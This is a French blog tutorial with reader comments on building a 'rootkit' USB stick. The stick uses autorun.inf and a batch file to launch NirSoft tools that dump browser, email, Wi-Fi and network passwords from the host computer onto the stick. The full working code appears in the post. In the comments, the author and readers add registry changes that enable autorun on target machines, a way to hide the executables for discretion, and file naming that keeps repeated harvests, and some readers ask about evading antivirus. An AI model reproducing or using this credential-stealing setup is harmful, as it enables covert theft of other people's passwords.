TUTO HACK: Création d’une clé USB rootkit

adata-909-thumb-drive

Aujourd’hui nous allons voir comment créer une clé USB qui récupère les mots de passe d’un ordinateur. Cette clé USB s’exécute automatiquement et récupère la plupart des mots de passe stocker sur votre ordinateur. Il est vraiment très utile surtout quand on a perdu ses mots de passe.

Pour créer notre clé USB on doit suivre les étapes ci-dessous:

Étape 1

Nous allons dans un premier temps télécharger quelque outils qui nous permettent de récupérer les mots de passe des applications les plus courantes. Toutes ces applications sont issues du site Nirsoft (http://www.nirsoft.net/).


usb-mot-de-passe

Maintenant nous allons placer tous les fichiers .exe  sur notre clé USB.

Étape 2

Ensuite il faut créer un fichier launch.bat qui va ouvrir automatiquement les programmes de récupération de mot de passe et il va  stocker les résultats dans un fichier texte.
Pour cela : on doit créer un nouveau document texte avec bloc note ou autres et écrire le code ci-dessous.

@echo off
start WebBrowserPassView.exe /stext dossier1/WebBrowserPassView.txt
start mailpv.exe /stext dossier1/mailpv.txt
start WirelessKeyView.exe /stext dossier1/WirelessKeyView.txt
start netpass.exe /stext dossier1/netpass.txt

 

Attention a bien vérifier que les noms des outils correspondent bien aux noms qui sont écrit dans le fichier launch.bat .

Comme vous avez pu le voir dans les lignes ci dessus, lorsque launch.bat sera exécuté , ces logs seront envoyé dans un dossier appelé dossier1. Il nous faut donc créé un nouveau dossier et le nommer dossier1.

 

Étape 3

Maintenant nous allons créer le fichier autorun.inf. Le fichier autorun.inf est un fichier texte enregistré à la racine d’un périphérique de stockage (CD, Clé USB, etc.) permettant d’automatiser le lancement de certains programmes lors de l’insertion d’un périphérique de stockage

Lorsque vous insérez votre clé USB généralement une fenêtre apparaît en nous demandant ce que l’on désire faire !

autoplay
Dans cette fenêtre nous allons créé une nouvelle option qui nous permettra ( une fois cliquez dessus ) de récupérez les mots de passes de l’ordinateur et de les stockés dans le dossier créé dans l’étape 2 .

Pour réalisez ceci on ouvre un nouveau document texte puis on insère le code suivant :

[autorun]

open=launch.bat

ACTION=’Le nom de la nouvelle option’

Enfin on enregistre notre fichier autorun.inf
Félicitation ! Votre clé USB rootkit est maintenant près à utiliser, il ne vous reste plus qu’à la tester. :D

Pour plus de nouveautés, merci de vous abonner à la newsletter du blog ou à son flux RSS. N’hésitez pas aussi à faire un tour sur Twitter, Google+ ou encore Facebook pour d’autres news.

Ceux qui ont aimé cet article ont également apprécié ceux-là :

Facebook Twitter Google+ Linkedin
  • lindor tcherry

    j’ai compris

  • lolo

    problème!! le fichier .bat ne veut pas s’ouvrir voila le message : « Windows ne trouve pas le fichier « WebBrowserPassView.exe » »
    me dire comment corriger ça
    merci d’avance ;)

  • Adrien

    Merci mais si je ne me trompe pas ceci ne fonctionne que sur les mot de passe enregistrer non ?

  • jean

    j’ai pas comprit l’etape 2, la creation du programme launch.bat

  • Youmakemeblush

    Hello je sais que je viens tard
    Je suis sous windows 10 tout semble fonctionner sauf l’autorun comment faire ?

  • Pierre

    Bonjour sa ne marche pas, quand je lance launch.bat il ouvre tous les fenetres des logiciels.

  • evil soul Edge 666

    bjr a tous je suis un nouveau dans le monde du hack et de l’informatique et ce serais sympa si quelqu’un voulait m’expliquer comment créer un fichier launch.bat svp

  • Théo

    Ton tutoriel est tout simplement génial, cependant comme j’ai vu dans les commentaires récurrents a ce sujet, je vais répéter:
    Pourquoi la plupart des appli .exe lancer a travers le fichier launch.bat enregistre les données dans des fichiers .cfg et non des fichiers .txt ?
    Merci d’avance de nous aider.
    Et encore merci pour ce super tuto :)

  • axis

    bonjour Ahmed
    Merci pour ce tuto
    moi qui y connait rien en informatique j’ai reussi a le faire
    seul petit probleme c’est que les données enregistré sont stocké en fichiers .cfg

    Quand je les ouvres avec le bloc notes ca me mets :

    [General]

    ShowGridLines=0

    SaveFilterIndex=0

    ShowInfoTip=1

    UseProfileFolder=0

    ProfileFolder=

    WinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00

    Columns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00

    Sort=0

    donc merci de m’aider svp

  • SomeOne

    Bonjour, pourrais-tu m’expliquer pourquoi seul WirelessKeyView m’affiche les mots de passe dans un .txt stp?
    merci d’avance :)

  • Spaaag

    Bonjours, les .txt ne sont pas dans le dossier pour chrome et firefox… En fait il y à que WirelessPassView qui s’affiche!
    Une solution?

  • Pismice

    Comment faire alors?

  • Antoine

    Bonjour, je suis débutant et j’ai suivi ce tuto, et je rencontre un problème, apres avoir téléchargé les fichiers et créé le launch.bat et le autorun.inf, quand je lance le launch.bat, il ouvre tout les programme puis crée sur la clé des fichiers .cfg pour chacun des programmes, que dois-je faire ? Merci

  • pat

    Pour info toutes les nouvelles versions dispo sur nirsoft sont dépourvus des commandes de créations auto des fichiers text (ou tout autre format)

  • Guillaume

    Le problème c’est que l’autorun ne passe plus! Désormais Windows les bloque de façon automatique pour ceux provenant d’une clé USB… Une idée?

  • jaja

    quand je télécharge les ficher ne sont pas .exe mais .ini c’est normal?

  • Joo

    Bonjour, je crois que je vais télécharger les logiciels 1 à 1 car le pack ne donne pas les fichiers .exe de la liste ..? ou alors, éclairez ma lanterne please. Merci!

  • Harri

    Merci trés bon Tuto & merci a @Draytane pour la modif

    Bonne continuation le site est super !!

  • Krm

    Moyen le autorun marche pas…

  • gb88

    bonjour et un immense merci pour ce tuto ! tout fonctionne tres bien mais je suis obligé de lancer le .bat par moi meme car la nouvelle option ne s’affiche pas… je suis sur Windows 8 cela a peut etre une incidence.. quelq’un peut-il m’éclairer svp ? merci !!

  • Alexandre B.

    Je pourrait metre quoi a la place de « l’option » je suis a cour d’idée ?

  • SweetHome A L A B A M A

    Lien mort, ce serait encore plus cool comme tuto si seulement les liens fonctionnaient

  • trolo

    Moi j’ai tout réussi… En anglais? normal…
    J’ai tous télécharger depuis des sites differents….

  • giorgio

    salut à tous,

    je suis désolé mais je n’arrive pas à tout comprendre dans l’installation des fichiers. Je n’arrive pas à avoir comme sur l’image ci-dessu (à avoir ces fichiers).
    Tous est écris en anglais….

    j’ai seulement réussi à faire le dossier Autorun et Launch mais RIEN ne marche…

    peut ont m’aider SVP ?

    Merci

  • Jyfezz

    Bonsoir ! Perso, ça ne marche pas pour mailpv et pspv :(
    Et je voulais savoir si cela fonctionne aussi sur marque et quel logiciel faut-il télécharger pour Safari ?

  • Cyril

    il faut marquer Run etc…
    quand on Branche un usb il y a marquer les options

  • alexy

    bonjour a tous sa ne marche ,je n’arrive pas a recuperai tous les mot de passe d’un coup et je suis sur windows 7
    quelqu’un pourrait m aider svp

  • Draytane

    top, tres bon tuto :-) personellement j’ai préféré faire une ou deux retouches, pour commencé j’ai mis les exe dans un dossier nommé « temp » (pour plus de discrétion)

    mais j’ai laissé le fichier ini et le bat à la racine.
    Puis j’ai modifié le bat comme ceci :

    « mkdir dossier
    start temp/ChromePass.exe /stext dossier/chrome.txt
    start temp/iepv.exe /stext dossier/iexplorer.txt
    start temp/mailpv.exe /stext dossier/mail.txt
    start temp/mspass.exe /stext dossier/mspass.txt
    start temp/PasswordFox.exe /stext dossier/netpass.txt
    start temp/pspv.exe /stext dossier/pspv.txt »
    comme ça il crée le dossier lui même, je trouve cela plus pratique. mais j’ai dû me séparer des exe qui demandaient confirmations :,-(

  • Invité

    Sans doute n’as tu pris que les fichiers de langue.

  • nik

    J’ai le même problème :

    Impossible de lancer automatiquement l’autorun.
    Cela pourrait il venir de ma clé?

  • Stark

    lien mort ! merci de renouveler

  • Remi

    Bonjour quand je telecharge les fichiers ce sont des .ini et non des .exe est ce normal?

  • toto

    une erreur c glisser ligne 2 etape 2

    et si une personne pouvait me dire pour que l’envoie se fasse par mail automatiquement

    cordialement

  • disqus_nmV7yVNPp3

    salam
    merci pour le tuto deja ^^
    on fait mon probleme c dans l’autorun.inf ca me crée pas une nouvel option quoi que je fasse :(

  • Phaerd

    Bonjour, j’aimerais savoir, peut-on contourner le problème des anti-virus? C’est à dire que dès que j’insère ma clé usb, mon pc la détecte comme malveillante et supprime donc tout les fichiers qui lui paraissent infectés.

  • Bonjour,comment desactiver la demande d’autorisation d’execution de « WirelessKeyView » ??? merci

  • Bonsoir Prestige,

    Merci pour ton commentaire, pour le nom de la nouvelle option; tu peux choisir ce que tu veux, ce n’est pas important, par exemple tu peux mettre « Ouvrir le dossier et afficher les fichiers »

    Voir cette image: http://www.funinformatique.com/wp-content/uploads/2012/08/usb_rookit.png

  • Prestige

    salut!
    merci pour votre tuto ca ma vraiment aider je vous remercie.
    j’ai une toute petite question peut être vous paraître idiote mais bon j prend le risque :)
    « Le nom de la nouvelle option »  il s’agit de quoi? qu’est ce que j dois marqué?
    merci d’avance et bonne continuation vraiment super votre site.

  • Prestige

    salut!

    merci pour votre tuto ca ma vraiment aider je vous remercie.
    j’ai une toute petite question peut être vous paraître idiote mais bon j prend le risque :)
    « Le nom de la nouvelle option »  il s’agit de quoi? qu’est ce que j dois marqué?
    merci d’avance et bonne continuation vraiment super votre site.

  • tristan

     effectivement sa fonctionne merci ! 

  • Ca marche parfaitement pour moi,  peux tu vérifier encore une fois ? Sinon tu peux tjrs les telecharger sur le site origine: http://www.nirsoft.net/password_recovery_tools.html

  • tristan

    Salut, je suis de retour une autre fois. Désolé pour le dérangement mais le lien est toujours mort, il y a t’il un lien torrent ou un site pour l’avoir ? Merci de m’avoir répondu !

  • Bonsoir tristan, ravie de te revoir ! :)  tu as raison le lien du pack est mort, je l’ai changé par un autre, tu peux mnt télécharger tout le pack comme avant !

    En ce qui concerne Remote keylogger, c’est un logiciel espion invisible pour surveiller tous les aspects de l’activité des utilisateurs. Il envoie à l’adresse email indiquée chaque frappe tapé dans un ordinateur et des capture d’écrans à intervalles réguliers… 

  • tristan

    salut elahmed jaimerai en savoir plus de se que vous avez dit a propos qu’ il existe des remotes keylogger  merci de me repondre vite et bonne journee 

  • tristan

    Salut, comme par hasard j’ai pommé tout le pack et j’aimerais le ravoir mais ton lien n’es plus valide il marche plus, si c’est possible de le remettre a nouveaux 

    j’ai essayer de le faire avec le tuto mais il me donne des erreurs. Merci de me répondre très vite. Vous m’avez parler aussi des remotes keylogger, j’aimerai en savoir plus et savoir qu’est ce que c’est.Merci d’avance et continuer comme ça. Ca déchire chaque jour, je lis vos article et celui la est mon préféré 

    répondez moi  vite !
     

  • kivoshki

    Pour voir le nom s’afficher tu dois autoriser l’exécution automatique de l’autorun.
    Pour activer l’autorun, Menu Démarrer -> Exécuter -> regedit.exe

    Tu cherche :[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer]

    et tu modifie la valeur de la clé en 91
    « NoDriveTypeAutoRun »=dword:00000091

  • Imadnohad

    ‘ Dans l’arborescence de la base de registre aller dans : [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer], modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun »=dword:00000091 enfin redémarre ton PC.’ Peut on faire cette modification pour chaque pc à qui on connecte la clé usb ??

  • noName

    Salut c’était pour savoir pourquoi quand j’exécute le launch.bat manuellement j’ai 
    « ERROR 5 : Accés refusé »?
    Et aussi savoir pk l’autorun ne propose « le nom de la nouvelle option » dans le panneau qui s’affiche quand on met la clé usb?
    merci bcp et j’adore tes tutos mec!

  • Sam 0409

    salut stp c quoi un fichier rootkit et comment je le crie meme chose pr launch bat reponds moi stp
     

  • Oui biensur, c’est le meme principe ! :)

  • Salut tristan, merci pour l’interet que tu portes a notre blog. Alors pour le truc du mail c’est pas possible, parce que le batch est tres limité à l’ensemble des commandes disponible dans cmd.exe par contre il existe des remotes keylogger qui vous permettent de faire ca ! :)

  • AbuM@lek

    Bjr,
    Autre chose,
    Quand j’essaye, sur win 7 mêm apres que j’ai modifié le clé de registre, j’obtiens la fenêtre d’exécution automatique qui permet de choisir le type d’applications,
    donc le script ne s’éxecute pas automatiquement !!!

  • AbuM@lek

    Salam Ahmed,

    La plupart des outils sont détectés comme Trojan/Virus (Faux alertes)

    La question est comment peut on contourner l’antivirus pour ne pas les détecter !!!
    parceque sinon, sa n’a pas d’importance la fonction d’automatiser les lancement.

    Merci pour le tuto ^^.

    A.M@

  • Jerzey

    Poy Ahmed,

    Un grand merci à toi !

    Le script « %random% » fonctionne très bien.

    J’ai mis à jour via nirsoft.net et effectivement le mien n’était pas à jour.

    Continue de publier tes articles, je les dévore à chaque fois =)

  • Ahmed El Jaouari

    Hi Jerzey,

    Merci pour votre lecture de cet article :)

    – Alors je commence par le premier problème, c’est a cause de l’autorun, sur certain ordinateur l’autorun est désactivé. Pour activer l’autorun, aller dans Menu Démarrer → Exécuter → (taper regedit.exe)
    Dans l’arborescence de la base de registre aller dans : [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer], modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun »=dword:00000091 enfin redémarre ton PC.

    – Pour le deuxième problème, essaie de télécharger la dernier version du PasswordFox sur http://www.nirsoft.net/utils/passwordfox.html

    – Enfin pour éviter l’écrasement des anciens fichiers, on peut ajouter la commande « %random% » au fichier lunch.bat:
    start mspass.exe /stext Mdp/mspass%random%.txt

    J’espère avoir t’aider Jerzey et a bientôt :D

  • Jerzey

    Salut !

    J’ai crée ce rootkit très sympa.

    Cependant voici mes observations et problèmes rencontrés (en espérant que tu puisses les résoudre) :

    – L’autorun + .bat sont bien implanté sur mon usb, cependant ils ne se lancent pas tout seul quand l’usb est inséré, il faut que l’user du PC, de manière voulue, clique sur l’icône launch.

    – Le soft pour Firefox ne fonctionne cependant pas. J’ai toujours un message d’erreur sur tous les pc utilisé.

    – Y aurait-il possibilité d’ajouter quelques lignes de code afin que le script crée un nouveau fichier texte nommé par exemple : MDP1 MDP2 etc etc plutôt que d’écraser à chaque fois l’ancien ? (Je ne connais pas la prog, néanmoins je pourrais chercher à faire ça, j’ai déjà fait pas mal de .bat mais je dois jouer avec les livres de commande :))